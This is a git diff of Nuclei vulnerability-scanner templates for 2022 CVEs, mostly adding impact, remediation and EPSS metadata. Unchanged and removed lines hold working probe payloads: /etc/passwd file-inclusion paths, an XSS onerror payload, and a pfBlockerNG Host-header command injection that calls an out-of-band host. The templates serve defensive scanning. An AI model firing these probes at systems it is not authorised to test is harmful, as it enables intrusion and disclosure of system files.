4b0a00483046022100f45abaef719f4fbab177f410e828732d7e0271752249761df9e80caa8de14bb0022100d6d5181a640dfea40e614a64d7ab03101dead62f821a435f5d3087686ca9b2e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31474.yaml b/nuclei-templates/CVE-2022/CVE-2022-31474.yaml index 5c476e0f02..946199f930 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31474.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31474.yaml @@ -5,27 +5,37 @@ info: author: aringo severity: high description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. + remediation: Upgrade to at least version 8.7.5 or higher reference: - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/ - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy - https://ithemes.com/backupbuddy/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474 - remediation: Upgrade to at least version 8.7.5 or higher + - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 - cwe-id: CWE-22 cve-id: CVE-2022-31474 - tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy + cwe-id: CWE-22 + epss-score: 0.0063 + epss-percentile: 0.78579 + cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: ithemes + product: backupbuddy + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes -requests: +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -33,5 +43,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 2022/09/14 +# digest: 4a0a00473045022100ecf44787bd6300f50e4a767ffe601dd4051e6dadfe6cd36dcbb948a853a44dbf02205339443407fd4fb29ff75bd9f6565a7dc2d382e699cca5b76c135da1b219d1cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31499.yaml b/nuclei-templates/CVE-2022/CVE-2022-31499.yaml index ab45c6cd94..b2a74b78ba 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31499.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31499.yaml @@ -1,27 +1,38 @@ id: CVE-2022-31499 info: - name: eMerge E3-Series - Command Injection + name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection author: pikpikcu severity: critical description: | - Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256 . + Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html - https://github.com/omarhashem123/CVE-2022-31499 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31499 - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-31499 + - https://eg.linkedin.com/in/omar-1-hashem classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31499 cwe-id: CWE-78 + epss-score: 0.50608 + epss-percentile: 0.97247 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: emerge_e3_firmware shodan-query: title:"eMerge" - verified: "true" - tags: packetstorm,cve,cve2022,emerge,rce + tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol -requests: +http: - raw: - | @timeout: 15s @@ -32,7 +43,8 @@ requests: - type: dsl dsl: - duration>=7 - - contains(all_headers, "text/html") + - contains(header, "text/html") - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and +# digest: 490a00463044022053c6c0b414614939f1d2b380003b62e3c5c2ad61ebb65e15a4655208c25c77ac022019921227f71829241115d45ac485c1a8d6378801ec680e5c9dc2b0ac2f7ebd44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31656.yaml b/nuclei-templates/CVE-2022/CVE-2022-31656.yaml index d15ea19969..f77ae5c7be 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31656.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31656.yaml @@ -6,21 +6,33 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations. reference: - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd - https://www.vmware.com/security/advisories/VMSA-2022-0021.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31656 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 + epss-score: 0.75034 + epss-percentile: 0.98069 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: vmware + product: identity_manager shodan-query: http.favicon.hash:-1250474341 - verified: "true" - tags: cve,cve2022,vmware,lfi + tags: cve2022,cve,vmware,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml" @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31793.yaml b/nuclei-templates/CVE-2022/CVE-2022-31793.yaml deleted file mode 100644 index 23797e44cc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31793.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-31793 - -info: - name: muhttpd <=1.1.5 - Local Inclusion - author: scent2d - severity: high - description: | - muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. - reference: - - https://derekabdine.com/blog/2022-arris-advisory.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - - https://derekabdine.com/blog/2022-arris-advisory - - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31793 - cwe-id: CWE-22 - metadata: - verified: "true" - tags: cve,cve2022,network,muhttpd,lfi,unauth - -network: - - host: - - "{{Hostname}}" - - inputs: - - data: "47455420612F6574632F706173737764" - type: hex - - data: "\n\n" - - read-size: 128 - matchers: - - type: word - part: body - encoding: hex - words: - - "726f6f743a" - -# Enhanced by mp on 2023/01/15 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31798.yaml b/nuclei-templates/CVE-2022/CVE-2022-31798.yaml index e1dca30afe..63e878830a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31798.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31798.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series. reference: - https://packetstormsecurity.com/files/167992/ - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31798 + - https://eg.linkedin.com/in/omar-1-hashem + - https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-31798 - cwe-id: CWE-79 + cwe-id: CWE-384 + epss-score: 0.00126 + epss-percentile: 0.46259 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: emerge_e3_firmware shodan-query: http.title:"eMerge" - verified: "true" - tags: cve2022,emerge,nortek,xss,packetstorm,cve + tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol -requests: +http: - method: GET path: - '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E' @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs 09/29/2022 +# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31814.yaml b/nuclei-templates/CVE-2022/CVE-2022-31814.yaml index e6b64fab53..4b923edec0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31814.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31814.yaml @@ -6,20 +6,33 @@ info: severity: critical description: | pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability. reference: - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html - https://github.com/EvergreenCartoons/SenselessViolence - https://nvd.nist.gov/vuln/detail/CVE-2022-31814 + - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31814 + cwe-id: CWE-78 + epss-score: 0.96552 + epss-percentile: 0.9952 + cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: - verified: "true" - tags: cve,cve2022,pfsense,pfblockerng,rce,oast + verified: true + max-request: 2 + vendor: netgate + product: pfblockerng + framework: pfsense + tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate -requests: +http: - raw: - |+ GET /pfblockerng/www/index.php HTTP/1.1 @@ -31,17 +44,16 @@ requests: Host: ' *; host {{interactsh-url}}; ' Accept: */* - req-condition: true unsafe: true + matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: dsl dsl: - 'contains(body_1, "GIF")' -# Enhanced by mp on 2022/10/06 + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" +# digest: 4a0a00473045022100ba04d468e5a36b316af5cde0bdfdce8d0e404952c265bdef97fb533f492ecc530220344972954e1c9bedcfeea63f373297c16cf7a9cf1c8cd580f99a97a6662fbae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31845.yaml b/nuclei-templates/CVE-2022/CVE-2022-31845.yaml index 10ffe5e7d4..332d5df030 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31845.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31845.yaml @@ -6,6 +6,10 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 @@ -15,12 +19,18 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31845 cwe-id: CWE-668 + epss-score: 0.00874 + epss-percentile: 0.80606 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - raw: - | @timeout: 10s @@ -39,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a004730450220320f5afe5b1b728587b2540cc0f8d5f61452ff54c986c8f7eadc1856f0a905ec022100d8f3ff9a7705d462d45e1199ba0ee430e88585bafcfc874820c5f88ddc76dbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31846.yaml b/nuclei-templates/CVE-2022/CVE-2022-31846.yaml index 985a50689b..fa1dde8f5b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31846.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31846.yaml @@ -6,21 +6,33 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 - https://nvd.nist.gov/vuln/detail/CVE-2022-31846 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31846 cwe-id: CWE-668 + epss-score: 0.00874 + epss-percentile: 0.80651 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn535g3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/live_mfg.shtml" @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4b0a00483046022100b9cd4b97ec4bf8df3c4a6c42dd322e42e6b9775243e3e0d725974ef0a3ba64c0022100f77e80b869527ee2c9ea6cae10ddb889a57d738ce645695ce451f64db8a8eae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31847.yaml b/nuclei-templates/CVE-2022/CVE-2022-31847.yaml index d424060031..145a1dea6d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31847.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31847.yaml @@ -6,6 +6,10 @@ info: severity: high description: | WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-31847 @@ -13,13 +17,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31847 - cwe-id: CWE-668 + cwe-id: CWE-425 + epss-score: 0.01285 + epss-percentile: 0.84308 + cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn579x3_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2022,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh" @@ -37,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a0047304502202db1124164825b434395a0b2ed0eaadb8991a9b259a4aca81bd4c657793b8da0022100d3a817be0f73d3bf46078f8483bf8c513a3047485830b59564d7d136ce67632e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31854.yaml b/nuclei-templates/CVE-2022/CVE-2022-31854.yaml index b8f049e1f2..bbee69b1c5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31854.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31854.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Codoforum. reference: @@ -13,20 +15,21 @@ info: - https://codoforum.com - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc - https://nvd.nist.gov/vuln/detail/CVE-2022-31854 + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-31854 cwe-id: CWE-434 - epss-score: 0.08519 - epss-percentile: 0.93791 + epss-score: 0.17108 + epss-percentile: 0.95958 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: codologic product: codoforum - tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive + tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic http: - raw: @@ -89,4 +92,4 @@ http: regex: - name="CSRF_token" value="([0-9a-zA-Z]+)"/> internal: true -# digest: 490a00463044022010d45fccfc97129aa6bfe22f0299ed3191bd2cb227062c258ad6ab3f14f105950220313e0ff56633438f2fc0b5fbbe0812fc864fdfede305f69c6767cedb98082308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31879.yaml b/nuclei-templates/CVE-2022/CVE-2022-31879.yaml index c086e79327..f475a1cadb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31879.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31879.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 8.8 cve-id: CVE-2022-31879 cwe-id: CWE-89 - epss-score: 0.05592 - epss-percentile: 0.92459 + epss-score: 0.05519 + epss-percentile: 0.9247 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Dashboard")' condition: and -# digest: 4b0a0048304602210083e50e077d56b4759480f5128ff203675c58bc748a3aa76f5e294374b53e1fb8022100b4ed3a111bdf8585f8979b3f84a2b4916dad6f516e74ddd5cf732207df7ca334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b95b388c981218ff2010a5af1002d6e6eccdcf8edf8a660ea9c6ce4483c07d20220773161e78dd1caf3ee58849de5a6107b7470729bdf71f8122d9bd4e60641cbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31974.yaml b/nuclei-templates/CVE-2022/CVE-2022-31974.yaml index fd28c53a74..70990c80c4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31974.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31974.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31974 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01429 + epss-percentile: 0.85199 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fb2f79e8fa6e2919961c34ea85b171532f2e3415685ef56f50e7e8e51cdc1e2022100c623b8d8f6895e7ebe9e536b4a8a76b507e4609292dcfec3df604a1a76e6ce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd024201d59f3b88ebf784aa61907ba5542a05e208b9e3de8c8bc7b30656f3c3022100f7aed5dfec5f88ed4297bc1f99e947e0c801b63bbf53a7dc7c1e655edb49ebac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31975.yaml b/nuclei-templates/CVE-2022/CVE-2022-31975.yaml index c0f26fd273..58ef41e98d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31975.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31975.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31975 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019fdb7784e13d9546046105563da76fa09da4a15068fa8abd82d21e8ae3226fd022100dca782f9338bf42e5c9e7098e1d65643de4c46281fb7942345d90df8607b6e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009910d6652352aff0eaac88c2b579c400a86a5f3ec6e122e5ac431a9d2f6079e2022100f750cb7ea36162240a1e8aef0aaebdc5a12c7e58e593b3b3ad12e780a227b3bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31976.yaml b/nuclei-templates/CVE-2022/CVE-2022-31976.yaml index 5981c810d6..d35e7b48bc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31976.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31976.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.82159 + epss-score: 0.02036 + epss-percentile: 0.87769 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a0047304502207100223526bdd43e418a135178fd12bc3456ca2e242196883fbc5cac7e66b2d2022100f21f001de22deb1056d7e32ba9eae114f904eec510d2c67f046c815372d0a977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c4e60b074ac073a47975a8d5098836fb4c229bc87513c05560b4e47c9b4a51d02201ce26a4554f2a66d0e4c8b00935d1587d66475498c0f538584c8099e981a9a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31977.yaml b/nuclei-templates/CVE-2022/CVE-2022-31977.yaml index 3acae51d25..f1d882f18c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31977.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31977.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31977 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.82159 + epss-score: 0.01192 + epss-percentile: 0.83594 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a00473045022100bbc45fe8e2c62d7be246cac1bf71061287a7264a7f94a251d6b64927017c824502207bdfced636893112385f58a94bdc9ce0bcebe8094796989974733e8b0ecbb238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 